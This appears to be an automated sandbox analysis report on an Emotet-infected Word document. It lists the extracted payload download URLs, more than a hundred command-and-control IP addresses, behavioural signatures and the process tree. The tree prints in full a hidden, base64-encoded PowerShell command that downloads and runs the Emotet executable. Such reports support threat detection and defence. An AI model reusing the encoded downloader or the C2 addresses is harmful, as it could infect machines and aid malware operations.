Analysis
-
max time kernel
26s -
resource
win10v191014 -
submitted
20-01-2020 10:34
General
Malware Config
Extracted
http://blog.hasilkan.com/cgi-bin/LxoH/
http://luatsusaigon.info/libs/zgis/
https://primalis.com.vn/wp-content/uploads/2020/rxm/
https://womenhealth.aureliusconferences.com/events/bYIkt2OE/
https://travelciwidey.com/wp-includes/kaU705/
Extracted
emotet
100.6.23.40:80
200.71.200.4:443
190.114.244.182:443
91.250.96.22:8080
37.187.72.193:8080
104.131.44.150:8080
167.71.10.37:8080
110.36.217.66:8080
206.81.10.215:8080
93.147.141.5:443
60.250.78.22:443
92.222.216.44:8080
95.213.236.64:8080
27.109.153.201:8090
66.7.242.50:8080
5.196.74.210:8080
181.143.126.170:80
209.97.168.52:8080
206.189.112.148:8080
64.53.242.181:8080
120.151.135.224:80
66.34.201.20:7080
205.185.117.108:8080
121.88.5.176:443
47.180.91.213:80
190.143.39.231:80
24.164.79.147:8080
201.236.135.104:443
217.160.182.191:8080
177.239.160.121:80
103.97.95.218:80
62.75.141.82:80
47.6.15.79:80
98.156.206.153:80
183.102.238.69:465
173.21.26.90:80
200.116.145.225:443
47.153.183.211:80
115.95.6.218:443
91.205.215.66:443
190.146.205.227:8080
139.130.241.252:443
190.12.119.180:443
105.247.123.133:8080
160.16.215.66:8080
79.159.249.152:80
192.241.255.77:8080
197.89.27.26:8080
24.94.237.248:80
73.11.153.178:8080
221.165.123.72:80
90.69.145.210:8080
87.230.19.21:8080
209.141.54.221:8080
178.237.139.83:8080
101.187.134.207:8080
78.189.180.107:80
85.67.10.190:80
186.86.247.171:443
105.27.155.182:80
179.13.185.19:80
64.40.250.5:80
201.184.105.242:443
46.105.131.69:443
72.186.137.156:80
104.236.246.93:8080
118.185.7.132:80
70.175.171.251:80
210.6.85.121:80
50.116.86.205:8080
180.92.239.110:8080
181.13.24.82:80
87.106.136.232:8080
78.186.5.109:443
24.105.202.216:443
59.103.164.174:80
190.55.181.54:443
173.66.96.135:80
159.65.25.128:8080
190.220.19.82:443
2.237.76.249:80
45.33.49.124:443
101.187.237.217:80
190.117.126.169:80
120.150.246.241:80
72.189.57.105:80
108.179.206.219:8080
62.138.26.28:8080
61.37.31.243:80
169.239.182.217:8080
68.172.243.146:80
5.32.55.214:80
78.24.219.147:8080
182.176.132.213:8090
70.169.53.234:80
95.128.43.213:8080
178.153.176.124:80
223.197.185.60:80
37.157.194.134:443
85.152.174.56:80
98.30.113.161:80
201.173.217.124:443
31.31.77.83:443
60.231.217.199:8080
104.131.11.150:8080
87.106.139.101:8080
209.146.22.34:443
201.229.45.222:8080
139.130.242.43:80
188.0.135.237:80
101.187.197.33:443
190.117.226.104:80
189.203.177.41:443
47.6.15.79:443
195.244.215.206:80
41.60.200.34:80
103.86.49.11:8080
149.202.153.252:8080
110.143.84.202:80
200.21.90.5:443
78.142.114.69:80
47.156.70.145:80
108.191.2.72:80
178.20.74.212:80
88.249.120.205:80
211.63.71.72:8080
58.171.42.66:8080
Signatures
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1628 Powershell.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 5004 WINWORD.EXE 4440 45.exe 3780 45.exe -
Process spawned unexpected child process 1 IoCs
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1628 5080 Powershell.exe 73 -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1628 Powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 1628 wrote to memory of 4440 1628 Powershell.exe 80 PID 4440 wrote to memory of 3780 4440 45.exe 81 -
Executes dropped EXE 2 IoCs
pid Process 4440 45.exe 3780 45.exe -
Suspicious behavior: EmotetMutantsSpam 1 IoCs
pid Process 3780 45.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 5004 WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\d563d2ca938193a5c92baa0fadbb293f052986310aa3df2d4ead7f249989fdd6.doc" /o ""1⤵
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Checks processor information in registry
- Suspicious behavior: AddClipboardFormatListener
PID:5004
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABNAGkAagBtAGwAdwBjAGYAegA9ACcAWQB3AHAAbwBnAGwAbgB6AGwAZQB2AGIAeAAnADsAJABNAG0AZABlAGIAYwBzAGoAcABkAGkAeQBuACAAPQAgACcANAA1ACcAOwAkAFcAYgBkAHMAdwBwAHgAbwBqAD0AJwBCAGMAagBnAGQAbQBlAGUAdwB1AGEAeAAnADsAJABRAGwAZgBsAHIAawB1AGMAYQByAHIAZwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATQBtAGQAZQBiAGMAcwBqAHAAZABpAHkAbgArACcALgBlAHgAZQAnADsAJABPAHQAYQBxAGgAbQBtAGkAcQBnAD0AJwBaAGEAaQB6AGIAZgB6AHIAbQB3AGIAeAByACcAOwAkAE8AbgBqAHYAcQB6AHYAYwBhAHoAbQBjAHcAPQAuACgAJwBuAGUAJwArACcAdwAtAG8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAG4AZQB0AC4AdwBFAEIAYwBsAEkARQBOAHQAOwAkAEoAcQBoAG0AbwBsAGwAagBpAHMAeQA9ACcAaAB0AHQAcAA6AC8ALwBiAGwAbwBnAC4AaABhAHMAaQBsAGsAYQBuAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8ATAB4AG8ASAAvACoAaAB0AHQAcAA6AC8ALwBsAHUAYQB0AHMAdQBzAGEAaQBnAG8AbgAuAGkAbgBmAG8ALwBsAGkAYgBzAC8AegBnAGkAcwAvACoAaAB0AHQAcABzADoALwAvAHAAcgBpAG0AYQBsAGkAcwAuAGMAbwBtAC4AdgBuAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUAcABsAG8AYQBkAHMALwAyADAAMgAwAC8AcgB4AG0ALwAqAGgAdAB0AHAAcwA6AC8ALwB3AG8AbQBlAG4AaABlAGEAbAB0AGgALgBhAHUAcgBlAGwAaQB1AHMAYwBvAG4AZgBlAHIAZQBuAGMAZQBzAC4AYwBvAG0ALwBlAHYAZQBuAHQAcwAvAGIAWQBJAGsAdAAyAE8ARQAvACoAaAB0AHQAcABzADoALwAvAHQAcgBhAHYAZQBsAGMAaQB3AGkAZABlAHkALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAGsAYQBVADcAMAA1AC8AJwAuACIAcwBwAGAAbABpAHQAIgAoACcAKgAnACkAOwAkAFcAZwBtAHYAZQBnAGgAaQB3AHcAeABiAD0AJwBTAG0AZABkAGgAbQBkAHYAdwAnADsAZgBvAHIAZQBhAGMAaAAoACQAWQBzAGEAeQB4AHIAeQBmAHoAIABpAG4AIAAkAEoAcQBoAG0AbwBsAGwAagBpAHMAeQApAHsAdAByAHkAewAkAE8AbgBqAHYAcQB6AHYAYwBhAHoAbQBjAHcALgAiAGQAbwBXAGAATgBgAGwAYABPAGEAZABGAGkAbABFACIAKAAkAFkAcwBhAHkAeAByAHkAZgB6ACwAIAAkAFEAbABmAGwAcgBrAHUAYwBhAHIAcgBnACkAOwAkAFgAZQB5AHMAcwBkAHoAcwB0AHAAYgBlAD0AJwBQAHMAcwBtAGMAZQBkAGQAawB1AGsAeAB1ACcAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQAUQBsAGYAbAByAGsAdQBjAGEAcgByAGcAKQAuACIATABgAGUATgBHAHQAaAAiACAALQBnAGUAIAAyADcAMgA4ADIAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwB0AGEAYABSAHQAIgAoACQAUQBsAGYAbAByAGsAdQBjAGEAcgByAGcAKQA7ACQAQQBrAHQAYQBoAGIAaQBwAGQAdAB4AD0AJwBTAHEAaQB0AGUAcwB0AGwAJwA7AGIAcgBlAGEAawA7ACQATwByAHUAdQBlAGkAdQBpAHEAcABlAG8APQAnAEoAcgBuAGsAYwBpAGoAZwB1AGIAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQgBlAHEAcQBpAGQAcgBwAD0AJwBNAGgAZABoAGoAawBoAHQAeQBkACcA1⤵
- Suspicious use of AdjustPrivilegeToken
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Users\Admin\45.exe"C:\Users\Admin\45.exe"2⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
PID:4440 -
C:\Users\Admin\45.exe--9a306e6b3⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
PID:3780
-
-